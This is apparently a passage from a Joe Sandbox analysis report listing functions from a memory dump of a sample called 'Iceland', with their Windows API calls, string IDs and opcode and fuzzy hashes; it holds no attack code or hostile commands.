                                                                                                                                                                                                                                                                • OleUninitialize.OLE32(?,00000000), ref: 00A22B98
                                                                                                                                                                                                                                                                • UnregisterHotKey.USER32(?), ref: 00A22D7D
                                                                                                                                                                                                                                                                • DestroyWindow.USER32(?), ref: 00A63A1B
                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 00A63A80
                                                                                                                                                                                                                                                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00A63AAD
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                                                                                                                                                                • String ID: close all
                                                                                                                                                                                                                                                                • API String ID: 469580280-3243417748
                                                                                                                                                                                                                                                                • Opcode ID: 9c08f3d8863a14e08361c116323a3c82678805f4f8e9d59603031bd28d25328e
                                                                                                                                                                                                                                                                • Instruction ID: f2db9ce8a36be6a8fe9f0d5d945bb096a07739e357610eea418b33983f692eda
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9c08f3d8863a14e08361c116323a3c82678805f4f8e9d59603031bd28d25328e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0AD16B327012229FCB29EF58DA95B69F7B0BF04750F1142ADE54A6B262DB31AD13DF40
                                                                                                                                                                                                                                                                Function 00A98835 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00A989F2
                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00A98A06
                                                                                                                                                                                                                                                                • GetFileAttributesW.KERNEL32(?), ref: 00A98A30
                                                                                                                                                                                                                                                                • SetFileAttributesW.KERNEL32(?,00000000), ref: 00A98A4A
                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00A98A5C
                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00A98AA5
                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00A98AF5
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CurrentDirectory$AttributesFile
                                                                                                                                                                                                                                                                • String ID: *.*
                                                                                                                                                                                                                                                                • API String ID: 769691225-438819550
                                                                                                                                                                                                                                                                • Opcode ID: 117d86d073bafed9c10f3ab40a41038c148a41d244faeae522f33dd324455554
                                                                                                                                                                                                                                                                • Instruction ID: 362df11a3a32745ea6fcd4d12d3c242550ecc0329f9648fbfc3a0164fdc29137
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 117d86d073bafed9c10f3ab40a41038c148a41d244faeae522f33dd324455554
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3C81B272A043019BCF24EF54C584ABEB3E8BF86350F54482EF485D7251DF38D9458B92
                                                                                                                                                                                                                                                                Function 00A27447 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SetWindowLongW.USER32(?,000000EB), ref: 00A274D7
                                                                                                                                                                                                                                                                  • Part of subcall function 00A27567: GetClientRect.USER32(?,?), ref: 00A2758D
                                                                                                                                                                                                                                                                  • Part of subcall function 00A27567: GetWindowRect.USER32(?,?), ref: 00A275CE
                                                                                                                                                                                                                                                                  • Part of subcall function 00A27567: ScreenToClient.USER32(?,?), ref: 00A275F6
                                                                                                                                                                                                                                                                • GetDC.USER32 ref: 00A66083
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00A66096
                                                                                                                                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00A660A4
                                                                                                                                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00A660B9
                                                                                                                                                                                                                                                                • ReleaseDC.USER32(?,00000000), ref: 00A660C1
                                                                                                                                                                                                                                                                • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00A66152
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                                                                                                                                                                • String ID: U
                                                                                                                                                                                                                                                                • API String ID: 4009187628-3372436214
                                                                                                                                                                                                                                                                • Opcode ID: 9460fc47f541a0c473703e635df9d3bcbaeab0540fb0ba0ba7dd2a2cc9e1e38f
                                                                                                                                                                                                                                                                • Instruction ID: a05a0f080063c80f481ecc117739e954ea2536a11bb008b587ec05901d24c635
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9460fc47f541a0c473703e635df9d3bcbaeab0540fb0ba0ba7dd2a2cc9e1e38f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7F71BC30500205EFCF25DFA8D984AFA7BB5FF49320F24827AED555B2A6C7318981DB50
                                                                                                                                                                                                                                                                Function 00AB955E Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A2249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00A224B0
                                                                                                                                                                                                                                                                  • Part of subcall function 00A219CD: GetCursorPos.USER32(?), ref: 00A219E1
                                                                                                                                                                                                                                                                  • Part of subcall function 00A219CD: ScreenToClient.USER32(00000000,?), ref: 00A219FE
                                                                                                                                                                                                                                                                  • Part of subcall function 00A219CD: GetAsyncKeyState.USER32(00000001), ref: 00A21A23
                                                                                                                                                                                                                                                                  • Part of subcall function 00A219CD: GetAsyncKeyState.USER32(00000002), ref: 00A21A3D
                                                                                                                                                                                                                                                                • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?), ref: 00AB95C7
                                                                                                                                                                                                                                                                • ImageList_EndDrag.COMCTL32 ref: 00AB95CD
                                                                                                                                                                                                                                                                • ReleaseCapture.USER32 ref: 00AB95D3
                                                                                                                                                                                                                                                                • SetWindowTextW.USER32(?,00000000), ref: 00AB966E
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00AB9681
                                                                                                                                                                                                                                                                • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?), ref: 00AB975B
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                                                                                                                                                                                                • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                                                                                                                                                                                • API String ID: 1924731296-2107944366
                                                                                                                                                                                                                                                                • Opcode ID: 6f525b1955cdb9f8daf461ac693885582dedc3cef384078b3e986f7dbaffddf0
                                                                                                                                                                                                                                                                • Instruction ID: f47440eb4e21e8dd880dd35b63c032be2a08d4cd8ac0bb7458653df2aabde4ef
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6f525b1955cdb9f8daf461ac693885582dedc3cef384078b3e986f7dbaffddf0
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A151BE71104314AFD704EF64DD96FAA77E8FB88714F000A2CFA96972E2DB709945CB52
                                                                                                                                                                                                                                                                Function 00A9CC98 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00A9CCB7
                                                                                                                                                                                                                                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00A9CCDF
                                                                                                                                                                                                                                                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00A9CD0F
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00A9CD67
                                                                                                                                                                                                                                                                • SetEvent.KERNEL32(?), ref: 00A9CD7B
                                                                                                                                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 00A9CD86
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3113390036-3916222277
                                                                                                                                                                                                                                                                • Opcode ID: b4b5c042b257bf7475fa7bb81b3702c311667467dd4109d4503c8dfd7356586d
                                                                                                                                                                                                                                                                • Instruction ID: bc90247c01087cae89dcd4f384defe74e91b4b984c1c42f4656e4c911c828c37
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b4b5c042b257bf7475fa7bb81b3702c311667467dd4109d4503c8dfd7356586d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 85319F75600A04AFDB21EFA48D88AAB7FFCEB45750B10452AF44696211EB34DD459B60
                                                                                                                                                                                                                                                                Function 00A8A215 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00A655AE,?,?,Bad directive syntax error,00ABDCD0,00000000,00000010,?,?), ref: 00A8A236
                                                                                                                                                                                                                                                                • LoadStringW.USER32(00000000,?,00A655AE,?), ref: 00A8A23D
                                                                                                                                                                                                                                                                  • Part of subcall function 00A2B329: _wcslen.LIBCMT ref: 00A2B333
                                                                                                                                                                                                                                                                • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00A8A301
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: HandleLoadMessageModuleString_wcslen
                                                                                                                                                                                                                                                                • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                                                                                                                                                                • API String ID: 858772685-4153970271
                                                                                                                                                                                                                                                                • Opcode ID: 2010e9fdd98d05d4f4b5cc35e3f6d52fd2dd6e0b7a3c294b393d94354bf4b4a5
                                                                                                                                                                                                                                                                • Instruction ID: ab73aa65961f49b9811492af4d178213975a9f344477f9233f80793cd185667b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2010e9fdd98d05d4f4b5cc35e3f6d52fd2dd6e0b7a3c294b393d94354bf4b4a5
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A8215E3285025EEFDF12FBA4DD06EEE7B39BF18700F044866F515650A2EB72A618DB11
                                                                                                                                                                                                                                                                Function 00A829EC Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetParent.USER32 ref: 00A829F8
                                                                                                                                                                                                                                                                • GetClassNameW.USER32(00000000,?,00000100), ref: 00A82A0D
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00A82A9A
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ClassMessageNameParentSend
                                                                                                                                                                                                                                                                • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                                                                                                                                                • API String ID: 1290815626-3381328864
                                                                                                                                                                                                                                                                • Opcode ID: f56a5ee521abadad115fe20f2413321b7f4800af062cb722a0b33c6526040317
                                                                                                                                                                                                                                                                • Instruction ID: 69818a30fbed85b9c9feb1b6e139729bb9c22f513783b3f29e5915d46f9eafa6
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f56a5ee521abadad115fe20f2413321b7f4800af062cb722a0b33c6526040317
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2011E97A6C4707B9F62C7721EC07FB6BBAC9F55BA4B200122F905E50D2FB62A8414B14
                                                                                                                                                                                                                                                                Function 00A27567 Relevance: 13.8, APIs: 9, Instructions: 291COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 00A2758D
                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00A275CE
                                                                                                                                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 00A275F6
                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 00A2773A
                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00A2775B
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Rect$Client$Window$Screen
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1296646539-0
                                                                                                                                                                                                                                                                • Opcode ID: be125bd11920f174e4639d65fa373928833c544560032b9c90d1aa68875250e1
                                                                                                                                                                                                                                                                • Instruction ID: fad4dfa7cf28ace6dadab35a15652323effa7c16dd897f91c7c91b277f871884
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: be125bd11920f174e4639d65fa373928833c544560032b9c90d1aa68875250e1
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 38C14A7990465AEFDB10CFACC980BEDBBF1FF18310F14852AE895A7250D734AA51DB60
                                                                                                                                                                                                                                                                Function 00A5D210 Relevance: 13.7, APIs: 9, Instructions: 209COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1282221369-0
                                                                                                                                                                                                                                                                • Opcode ID: ddc8ba48618046a30ab1ee9a73a30ccc7b99161e79639ba5d320c285cef7e415
                                                                                                                                                                                                                                                                • Instruction ID: 59e0bd477c2dcd436473b75475e7e35cee7ff4e9428912160d84a1f6687e3de8
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ddc8ba48618046a30ab1ee9a73a30ccc7b99161e79639ba5d320c285cef7e415
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E161E4B1905301AFDB31AFB9D9817AE7BB4FF12322F14016DED45AB282E7319849C791
                                                                                                                                                                                                                                                                Function 00AB5B72 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00AB5C24
                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000000), ref: 00AB5C65
                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000005,?,00000000), ref: 00AB5C6B
                                                                                                                                                                                                                                                                • SetFocus.USER32(?,?,00000005,?,00000000), ref: 00AB5C6F
                                                                                                                                                                                                                                                                  • Part of subcall function 00AB79F2: DeleteObject.GDI32(00000000), ref: 00AB7A1E
                                                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00AB5CAB
                                                                                                                                                                                                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00AB5CB8
                                                                                                                                                                                                                                                                • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00AB5CEB
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00AB5D25
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00AB5D34
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3210457359-0
                                                                                                                                                                                                                                                                • Opcode ID: 327c108c3b1f338cb18148081487f1a245b519be7e360d1551551d1ce517d6eb
                                                                                                                                                                                                                                                                • Instruction ID: dc54d3ff7a2853376a7e41502d01f3d9cf5c32c0a111f0c6ad907b77811680f3
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 327c108c3b1f338cb18148081487f1a245b519be7e360d1551551d1ce517d6eb
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 66519F30E40B08BFEF249FB8CC4ABD83B6ABB05754F144222F5249A1E2D775A990DB40
                                                                                                                                                                                                                                                                Function 00A213A6 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00A628D1
                                                                                                                                                                                                                                                                • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00A628EA
                                                                                                                                                                                                                                                                • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00A628FA
                                                                                                                                                                                                                                                                • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00A62912
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00A62933
                                                                                                                                                                                                                                                                • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00A211F5,00000000,00000000,00000000,000000FF,00000000), ref: 00A62942
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00A6295F
                                                                                                                                                                                                                                                                • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00A211F5,00000000,00000000,00000000,000000FF,00000000), ref: 00A6296E
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
